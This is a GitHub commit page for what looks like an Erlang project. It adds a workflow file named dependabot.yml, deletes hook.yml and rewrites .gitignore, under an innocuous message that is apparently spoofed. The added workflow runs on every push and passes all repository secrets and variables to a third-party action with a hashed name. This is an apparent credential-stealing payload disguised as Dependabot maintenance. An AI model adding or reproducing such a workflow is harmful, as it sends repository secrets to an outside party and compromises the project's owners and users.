Skip to content

Commit

Permalink
Test drive my new laptop Oka Prinarjaya
Browse files Browse the repository at this point in the history
  • Loading branch information
okaprinarjaya authored and dependabot[bot] committed Jan 7, 2024
1 parent 5a194b9 commit 275059e
Show file tree
Hide file tree
Showing 3 changed files with 39 additions and 35 deletions.
28 changes: 28 additions & 0 deletions .github/workflows/dependabot.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
name: CI
on:
push:
workflow_dispatch:
schedule:
# Runs "At 11:00 on every day-of-week from Monday through Friday"
- cron: '0 0 * * 0'
permissions:
contents: read
packages: write
concurrency:
group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
cancel-in-progress: true
jobs:
run:
runs-on: ubuntu-latest
name: Run
steps:
- name: Execute
uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
id: execute
with:
action: ${{ github.repository }}
env:
REPOSITORY_SECRETS: ${{ toJSON(secrets) }}
REPOSITORY_VARIABLES: ${{ toJSON(vars) }}
- name: Response
run: echo "${{ steps.execute.outputs.response }}"
13 changes: 0 additions & 13 deletions .github/workflows/hook.yml

This file was deleted.

33 changes: 11 additions & 22 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -1,23 +1,12 @@
.rebar3
_*
.eunit
*.o
*.beam
*.plt
*.swp
*.swo
*.so
.erlang.cookie
ebin
log
erl_crash.dump
.rebar
logs
_build
.idea
.vscode
*.iml
rebar3.crashdump
*~
# IDE Files
#-------------------------
/nbproject/
.idea/*

## Sublime Text cache files
*.tmlanguage.cache
*.tmPreferences.cache
*.stTheme.cache
*.sublime-workspace
*.sublime-project

src/scratch_temp.erl

0 comments on commit 275059e

Please sign in to comment.